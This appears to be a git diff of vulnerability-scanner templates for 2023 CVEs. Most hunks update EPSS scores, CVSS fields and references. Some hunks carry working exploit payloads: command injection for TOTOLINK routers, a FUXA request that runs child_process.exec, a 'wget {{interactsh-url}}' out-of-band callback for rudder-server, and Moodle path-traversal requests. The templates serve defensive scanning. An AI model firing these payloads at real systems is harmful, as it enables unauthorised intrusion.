--git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index e69c3c0787..b048efc776 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29489 cwe-id: CWE-79 - epss-score: 0.00276 - epss-percentile: 0.64121 + epss-score: 0.00167 + epss-percentile: 0.53116 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 2c9d2a3bbc..4ea9001ec0 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-29622 cwe-id: CWE-89 epss-score: 0.01215 - epss-percentile: 0.83553 + epss-percentile: 0.83729 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 42da7244c4..2957ff0130 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29623 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.40883 + epss-score: 0.00096 + epss-percentile: 0.39796 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 7fd524f6ea..b24d2fd63f 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2982 cwe-id: CWE-288 epss-score: 0.01048 - epss-percentile: 0.82159 + epss-percentile: 0.82329 cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 1a06661227..992967a984 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-29887 cwe-id: CWE-22 epss-score: 0.00439 - epss-percentile: 0.716 + epss-percentile: 0.71903 cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index d6d1fa0d30..112324d739 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.1 cve-id: CVE-2023-29919 cwe-id: CWE-276 - epss-score: 0.01214 - epss-percentile: 0.83546 + epss-score: 0.01262 + epss-percentile: 0.84105 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 7b86186c98..03e7246d58 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-29922 cwe-id: CWE-1188 - epss-score: 0.00538 - epss-percentile: 0.74271 + epss-score: 0.00448 + epss-percentile: 0.72175 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index c91626851e..549f3fc6a3 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-29923 cwe-id: CWE-276 - epss-score: 0.00802 - epss-percentile: 0.79495 + epss-score: 0.00332 + epss-percentile: 0.6777 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index 46fbe975b6..73c6cd3cd8 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -9,14 +9,19 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-30013 - https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2 + - http://packetstormsecurity.com/files/174799/TOTOLINK-Wireless-Routers-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-30013 cwe-id: CWE-78 - epss-score: 0.102540000 - epss-percentile: 0.942680000 + epss-score: 0.93618 + epss-percentile: 0.98819 cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: totolink + product: x5000r_firmware tags: cve,cve2023,totolink,unauth,rce,intrusive http: @@ -26,7 +31,6 @@ http: Host: {{Hostname}} {"command":"127.0.0.1; ls>../{{randstr}};#","num":"230","topicurl":"setTracerouteCfg"} - - | GET /{{randstr}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index bf348873df..d9218d4478 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30019 cwe-id: CWE-918 - epss-score: 0.00336 - epss-percentile: 0.67605 + epss-score: 0.00205 + epss-percentile: 0.58109 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index df2f859cb3..57cd7e5a6b 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30150 cwe-id: CWE-89 - epss-score: 0.02253 - epss-percentile: 0.88149 + epss-score: 0.02634 + epss-percentile: 0.89141 cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index d9f15d94de..9ef885eb82 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-30210 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29093 + epss-percentile: 0.29433 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 8e53c11708..5af4ea5de0 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30212 cwe-id: CWE-79 - epss-score: 0.03155 - epss-percentile: 0.89844 + epss-score: 0.02614 + epss-percentile: 0.89101 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 493fc87c27..be71f2528e 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30256 cwe-id: CWE-79 - epss-score: 0.01475 - epss-percentile: 0.85124 + epss-score: 0.01287 + epss-percentile: 0.84265 cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index 0ef4422609..5891fe261e 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -9,18 +9,22 @@ info: reference: - https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/ - https://nvd.nist.gov/vuln/detail/CVE-2023-30625 + - http://packetstormsecurity.com/files/173837/Rudder-Server-SQL-Injection-Remote-Code-Execution.html + - https://github.com/rudderlabs/rudder-server/commit/0d061ff2d8c16845179d215bf8012afceba12a30 + - https://github.com/rudderlabs/rudder-server/commit/2f956b7eb3d5eb2de3e79d7df2c87405af25071e classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-30625 cwe-id: CWE-89 - epss-score: 0.010870000 - epss-percentile: 0.826540000 + epss-score: 0.93265 + epss-percentile: 0.98773 cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rudderstack + product: rudder-server tags: cve,cve2023,rudder,rudderstack - variables: cmd: "wget {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index c7eb3543bb..c85a946e2b 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30777 cwe-id: CWE-79 - epss-score: 0.00343 - epss-percentile: 0.67945 + epss-score: 0.00273 + epss-percentile: 0.64292 cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 4861eadc9a..ef39ac43ed 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -9,13 +9,21 @@ info: reference: - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu - https://nvd.nist.gov/vuln/detail/CVE-2023-30943 + - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-77718 + - https://bugzilla.redhat.com/show_bug.cgi?id=2188605 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/54TM5H5PDUDYXOQ7X7PPYWP4AJDAE73I/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2023-30943 - cwe-id: CWE-73 + cwe-id: CWE-610,CWE-73 + epss-score: 0.0138 + epss-percentile: 0.84811 + cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: max-request: 4 + vendor: moodle + product: moodle shodan-query: title:"Moodle" tags: cve,cve2023,moodle,xss,rce,authenticated @@ -25,24 +33,22 @@ http: GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | GET /login/index.php HTTP/2 Host: {{Hostname}} - - | POST /login/index.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded anchor=&logintoken={{token}}&username={{username}}&password={{password}} - - | GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1 Host: {{Hostname}} host-redirects: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 8dae9091af..c6fdcc0843 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-31059 cwe-id: CWE-22 - epss-score: 0.00353 - epss-percentile: 0.68399 + epss-score: 0.00393 + epss-percentile: 0.70374 cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index 12a8c59212..8af1d5290e 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -9,12 +9,18 @@ info: reference: - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md - https://nvd.nist.gov/vuln/detail/CVE-2023-31465 + - https://fsmlabs.com/fsmlabs-cybersecurity/ classification: - cve-id: CVE-2023-31465 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-31465 + epss-score: 0.00698 + epss-percentile: 0.78001 + cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fsmlabs + product: timekeeper shodan-query: http.favicon.hash:2134367771 tags: cve,cve2023,timekeeper,rce,oast diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 99e24d0a7f..90f81192e1 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-31548 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.31901 + epss-percentile: 0.32257 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 8a3b9810df..3ca5cc11a0 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-32235 cwe-id: CWE-22 epss-score: 0.00998 - epss-percentile: 0.81698 + epss-percentile: 0.81896 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index a0d64051fb..cbd058171e 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 - epss-score: 0.02722 - epss-percentile: 0.89171 + epss-score: 0.02563 + epss-percentile: 0.89003 cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 2959d97e70..ec6618476f 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-32315 cwe-id: CWE-22 - epss-score: 0.96325 - epss-percentile: 0.99343 + epss-score: 0.96072 + epss-percentile: 0.99301 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index c0b54eaa85..ab51539117 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32563 cwe-id: CWE-22 - epss-score: 0.24808 - epss-percentile: 0.96032 + epss-score: 0.30371 + epss-percentile: 0.96404 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 0eec105508..888fc5d60e 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33338 cwe-id: CWE-89 - epss-score: 0.00732 - epss-percentile: 0.78382 + epss-score: 0.00761 + epss-percentile: 0.79056 cpe: cpe:2.3:a:old_age_home_management_system_project:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index 91127abd2a..f75418978b 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -6,21 +6,24 @@ info: severity: medium description: | Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect + remediation: | + Update to the latest version of blogengine.net CMS to fix the open redirect vulnerability. reference: - https://github.com/hacip/CVE-2023-33405 - https://nvd.nist.gov/vuln/detail/CVE-2023-33405 - remediation: | - Update to the latest version of blogengine.net CMS to fix the open redirect vulnerability. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-33405 cwe-id: CWE-601 + epss-score: 0.00071 + epss-percentile: 0.29407 + cpe: cpe:2.3:a:blogengine:blogengine.net:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: blogengine_cms - vendor: blogengine verified: true + max-request: 1 + vendor: blogengine + product: blogengine.net tags: cve,cve2023,Blogengine,cms,redirect http: diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 16238a47b5..2b226d6c7e 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33439 cwe-id: CWE-89 - epss-score: 0.00389 - epss-percentile: 0.69875 + epss-score: 0.00475 + epss-percentile: 0.72956 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index cad0838805..d1a16b4001 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33440 cwe-id: CWE-434 - epss-score: 0.03396 - epss-percentile: 0.90194 + epss-score: 0.04526 + epss-percentile: 0.91537 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 9eccb01be5..5ce4d99a2e 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-3345 cwe-id: CWE-200 - epss-score: 0.00599 - epss-percentile: 0.75693 + epss-score: 0.00441 + epss-percentile: 0.71968 cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index e3c5c2d336..68470b7521 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-33510 cwe-id: CWE-668 epss-score: 0.00347 - epss-percentile: 0.68111 + epss-percentile: 0.68454 cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index e5c6254c3a..cb9e8d068e 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-33568 cwe-id: CWE-552 epss-score: 0.35763 - epss-percentile: 0.96601 + epss-percentile: 0.96648 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 166dd233b4..669aa18f66 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -14,14 +14,16 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33831 cwe-id: CWE-77 + epss-score: 0.03756 + epss-percentile: 0.90747 cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:* - epss-score: 0.00314 metadata: - fofa-query: title="FUXA" - max-request: 2 verified: "true" + max-request: 2 + vendor: frangoteam + product: fuxa + fofa-query: title="FUXA" tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth - variables: filename: "{{rand_base(6)}}" @@ -33,7 +35,6 @@ http: Content-Type: application/json {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}} - - | GET /_images/{{filename}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index bc1c14d998..ab21d35913 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34124 cwe-id: CWE-287,CWE-305 - epss-score: 0.01154 - epss-percentile: 0.83049 + epss-score: 0.01634 + epss-percentile: 0.86077 cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 2ffca5bce9..77f58df74f 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -3,7 +3,7 @@ id: CVE-2023-34192 info: name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting author: ritikchaddha - severity: high + severity: critical description: | Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. remediation: | @@ -12,10 +12,20 @@ info: - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192 + - https://wiki.zimbra.com/wiki/Security_Center + - https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9 cve-id: CVE-2023-34192 + cwe-id: CWE-79 + epss-score: 0.28331 + epss-percentile: 0.96287 + cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 2 + vendor: zimbra + product: collaboration shodan-query: http.favicon.hash:475145467 fofa-query: icon_hash="475145467" tags: cve,cve2023,zimbra,xss,authenticated diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index 8052736ded..62c8319b8a 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -18,10 +18,10 @@ info: cve-id: CVE-2023-34259 cwe-id: CWE-22 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-50306417 - verified: true - tags: cve,cve2023,kyocera,lfi,printer + tags: packetstorm,cve,cve2023,kyocera,lfi,printer http: - method: GET diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 1e64f4fdc2..1b646820b4 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34362 cwe-id: CWE-89 - epss-score: 0.93679 - epss-percentile: 0.9877 + epss-score: 0.92179 + epss-percentile: 0.98627 cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: vendor: progress product: moveit_cloud shodan-query: http.favicon.hash:989289239 - tags: cve,cve2023,moveit,rce,sqli,intrusive,kev + tags: packetstorm,cve,cve2023,moveit,rce,sqli,intrusive,kev variables: sessioncookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index a9a15f76ed..4e66446630 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-34537 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.28777 + epss-percentile: 0.29109 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index f94c51bc81..7742c63fa1 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34598 cwe-id: CWE-22 - epss-score: 0.03671 - epss-percentile: 0.9052 + epss-score: 0.03642 + epss-percentile: 0.90603 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index 9d91847c33..ed588a0b29 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-34599 cwe-id: CWE-79 - epss-score: 0.00107 - epss-percentile: 0.42545 + epss-score: 0.00071 + epss-percentile: 0.29433 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 08f2b0d5c8..0081ad0670 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3460 cwe-id: CWE-269 - epss-score: 0.1492 - epss-percentile: 0.95093 + epss-score: 0.20425 + epss-percentile: 0.95782 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 6ba3496b13..e197b51077 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34659 cwe-id: CWE-89 - epss-score: 0.04804 - epss-percentile: 0.91686 + epss-score: 0.05584 + epss-percentile: 0.92389 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 964713c327..1f333488ac 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3479 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.3156 + epss-score: 0.0007 + epss-percentile: 0.29142 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 8564178b1b..5fb51f1fcd 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-34843 cwe-id: CWE-22 - epss-score: 0.00297 - epss-percentile: 0.65501 + epss-score: 0.00349 + epss-percentile: 0.68595 cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 95c7985429..f3d9200344 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 - epss-score: 0.81793 - epss-percentile: 0.97936 + epss-score: 0.88794 + epss-percentile: 0.98348 